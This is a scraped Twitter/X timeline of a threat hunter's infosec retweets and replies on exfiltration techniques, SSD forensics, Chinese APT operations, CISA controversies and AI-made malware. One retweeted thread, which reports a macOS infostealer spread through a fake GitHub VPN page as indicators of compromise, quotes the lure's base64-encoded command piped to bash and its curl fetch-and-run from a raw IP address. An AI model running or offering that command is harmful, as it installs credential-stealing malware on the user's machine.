bat

612 posts

bat banner
bat

bat

@batlogged

thunter

169.254.0.1 Katılım Nisan 2020
313 Takip Edilen149 Takipçiler
bat retweetledi
mthcht
mthcht@mthcht2·
LOLEXFIL Living off the land Data Exfiltration method lolexfil.github.io
English
3
137
506
51K
bat retweetledi
J⩜⃝mie Williams
J⩜⃝mie Williams@jamieantisocial·
hunting through telemetry for your own payload's compiler flags that you can't remember is peak infosec.
J⩜⃝mie Williams tweet media
English
6
9
93
7.7K
bat retweetledi
Dex
Dex@DexFi_·
This will make more sense in 2026-2027
English
162
3.5K
21.6K
900K
bat retweetledi
rootsecdev
rootsecdev@rootsecdev·
Good morning.
rootsecdev tweet media
English
6
21
413
13.7K
bat
bat@batlogged·
@IntelSecX i miss the era before you paywalled your tool.
English
0
0
0
126
Intelligence Security X
Intelligence Security X@IntelSecX·
🔍 Intelligence Search: Email Investigation Searching: noreply@uber.com Result: 900 files found 📂 Leaks Logs (826 files): ├─ Users who received Uber emails ├─ Browser history containing noreply@uber.com ├─ Cookie files with Uber sessions └─ Autofill data with Uber credentials 💾 Data Breaches (59 files): ├─ Email appears in breach compilations ├─ User inboxes containing Uber receipts └─ Marketing databases 🧅 Darknet Tor (6 files): ├─ Underground forum discussions └─ Uber account discussion threads 📋 Paste Sites → 6 files 🌐 Public Leaks → 3 files ⚠️ Why company emails appear in leaks logs: When someone is infected, leaks harvest: ├─ Entire browser history (every email address seen) ├─ Inbox contents (if webmail was accessed) ├─ Autofill containing @uber.com domains └─ Cookies from uber.com sessions 💡 You don't need to be breached. Your customers getting infected = Your email in leaks logs. 🛡 For Organizations: - Brand Monitoring → Track how your corporate emails circulate in underground sources - Phishing Detection → Identify if attackers are referencing your noreply@ addresses - Customer Exposure → Understand how many of your users have been compromised - Incident Scope → Measure exposure beyond your own infrastructure 🎯 For Bug Bounty & Security Researchers: - Validate scope of exposure during authorized assessments - Demonstrate real-world impact to program owners - Identify patterns: which company emails appear most in leaks logs - Document findings for responsible disclosure reports Understanding exposure is the first step to remediation. 🔗 DEMO intelligencesecurity.io/search/demo/in… 🤖 t.me/intelligencese… #OSINT #InfoSec #BugBounty
Intelligence Security X tweet mediaIntelligence Security X tweet media
English
2
13
83
6.5K
bat retweetledi
Nana Sei Anyemedu
Nana Sei Anyemedu@RedHatPentester·
It will surprise you to know that a lot of Digital Forensics Investigators don’t really like the idea of investigating SSDs. EVIDENCE CAN BE LOST AFTER A LAWFUL SEIZURE, AND SOLID-STATE DRIVES (SSDS) CAN ACT AS UNINTENTIONAL ANTI-FORENSIC DEVICES. SSDs Break a Core Forensic Principle in Digital Forensics. One of the foundational assumptions in digital forensics, developed during the era of magnetic hard disk drives (HDDs), is: “Deleted data remains on storage media until it is overwritten.” This is a long traditional principle. Solid-State Drives can be viewed as unintentional anti-forensic devices because, unlike deliberate anti-forensic tools, they destroy potential evidence as part of their normal operation, without any malicious intent from the user.  The assumption that deleted data remains until overwritten no longer universally applies. SSDs break this principle by design through: 1. TRIM 2. Garbage collection 3. Wear leveling Because SSDs invalidate the “deleted data persists” principle, investigators must adapt by: 1. Prioritizing live analysis 2. Capturing volatile memory 3. Collecting system logs and cloud artifacts 4. Acting quickly before TRIM executes
Mololuwa | Cybersecurity - (The God Complex)@cyber_rekk

An SSD, which means Solid State Drive, is a type of storage device in a computer that saves your files, apps, and operating system, but it does this using small memory chips instead of moving parts like a traditional hard drive. Because it has no spinning disks or mechanical parts, it is much faster, quieter, more durable, and uses less power. This makes your computer faster, so programs open almost instantly, files transfer quicker, and your system boots up in seconds saving you a lot of time compared to older hard drives.

English
3
27
249
29.5K
bat retweetledi
thaddeus e. grugq
thaddeus e. grugq@thegrugq·
The systems bible, John gall.
thaddeus e. grugq tweet media
vx-underground@vxunderground

Madhu Gottumukkala, the freshly elected Director of the United States Cybersecurity and Infrastructure Security Agency (CISA) has had a few ... kerfuffles ... since he began the role. He initially was Deputy Director, nominated by United States Secretary of Homeland Security (DHS) Kristi Noem, in May 16th. May 30th most leadership at CISA had resigned. He was promoted to Director. In June, 2025, Gottumukkala requested access to a DHS controlled access program. He was issued a polygraph test. He failed the polygraph test. Six staffers were suspended after Gottumukkala failed the polygraph test because it was determined Gottumukkala did not need to take a polygraph test for access to the controlled access program. In January, 2026, it was unveiled that Gottumukkala had, on at least four different occasions, uploaded FOUO (For Official Us Only) documents to ChatGPT. This violates DHS guidelines. DHS employees are issued an AI agent called "DHSChat". Per DHS, ChatGPT is blocked on DHS networks and devices. However, Gottumukkala requested special access to use ChatGPT and it was granted. It was during a routine audit it was discovered Gottumukkala uploaded these FUOU documents.

English
3
48
423
27.9K
bat retweetledi
inversecos
inversecos@inversecos·
What separates Chinese cyber ops from Five Eyes? Three things that shifted my thinking about this topic: 1. Early cyber training (90s-2000s) happened on live targets. Not sandboxes, not simulations...actual foreign infrastructure. The "practice" was the operation. Operational errors caught during IR back then weren't failures of tradecraft... they were the cost of learning on production. 2. The private sector operates as APT infrastructure. Cybersecurity companies founded by former 2000s hackers (Topsec, i-SOON, Integrity Tech) were later publicly linked to state-directed operations. The line between "legitimate vendor" and "APT contractor" is deliberately blurred (by design). 3. Operators don't stay siloed in their APT group. They rotate across teams for decades, carrying often the exact same tools, tactics with them. What we label as "different APT groups" is often the same people with different hats. This makes attribution way messier than the tidy narrative we see in threat reports. Worth reading this epic report published by the Zurich Centre for Security Studies if this stuff keeps you up at night: ethz.ch/content/dam/et…
English
17
160
811
109.7K
bat
bat@batlogged·
@jamieantisocial corp apps used in SOCs (re: excel, slack) will pick up both URI schemes and domains and attempt to hyperlink. the amount of alerts generated from misclicks... 💀
English
1
0
1
20
J⩜⃝mie Williams
J⩜⃝mie Williams@jamieantisocial·
i get ~𝓼𝓵𝓲𝓰𝓱𝓽𝓵𝔂~ annoyed when network IOCs are defanged more than once. e.g., 𝚑𝚡𝚡𝚙[:]//𝚠𝚑𝚈[.]𝚜օ[.]𝚎𝚡𝚝𝚛𝚊 am i being...
English
6
0
18
1.3K
bat retweetledi
RussianPanda 🐼 🇺🇦
RussianPanda 🐼 🇺🇦@RussianPanda9xx·
Honestly it doesn't matter much for defenders - code is code. We mostly talk about it to point out that threat actors STILL can't properly leverage AI and it's fun to roast them. This one goes out to everyone claiming "AI is a massive threat because TAs will use it for big bad things"
Washi@washi_dev

Maybe noob question. Why do we care whether malware was created with help of AI? I see people talking about it like it matters a lot, but for us defenders, it's still just code that you can reverse/write rules for, no? Besides, it's not as if most malware wasn't slop already..🙃

English
12
5
54
9.6K
bat retweetledi
Who said what?
Who said what?@g0njxa·
Interesting MacOS infostealer campaign via Github traffic (🎩 @osint_barbie ) Spread as a fake Shimo VPN Client (image 1 - github[.]com/Browndash1368/shimo-mac-unlocked-edition) redirecting users to a fake Github download page (image 2) browndash1368[.]github[.]io >> macos[.]aidevmac[.]com github[.]macos-developer[.]com/main The a bash script is shared: echo "GitHub-AppInstaller: https://dl[.]github[.]com/drive-file-stream/GitHubApplicationSetup.dmg" && echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC9nejF4c2hjYnU3N29nbWd0KSI=' | base64 -d | bash Chaining more bash script from C2 (image 3) /bin/bash -c "$(curl -fsSL http://91[.]92[.]242[.]30/gz1xshcbu77ogmgt)" Then downloading and executing a malicious Mach-O (image 4) Looking at strings inside the Mach-O, there is a reference to "macos-stealer-v2" IOCs a0e66f3067e4aaf5b83e45b7845cc43b2fc96032a4398cab7cc9d11f4f962e91 (this thread) ab267488d2c0a6300b61b5c9046cb86fe4a9ac3fe9a615acd374465b3a4b26c2 (older)
Who said what? tweet mediaWho said what? tweet mediaWho said what? tweet mediaWho said what? tweet media
English
5
16
72
5.8K
bat retweetledi
vx-underground
vx-underground@vxunderground·
@PayPal @Microsoft Microslop Slopilot at PayPal Checkout, thanks to Slopya Slopdella, Chief Executive Slopiccer of Microslop
English
22
153
5K
46.9K
bat retweetledi
gaut
gaut@0xgaut·
to all my fellow bookmarkors
gaut tweet media
English
1K
9.2K
62.6K
1.1M

Keşfet

@vmfunc @MDLcsgo @DziurwaF @Thewebb_io @IanCarrollShow @IntelSecX @uber @jamieantisocial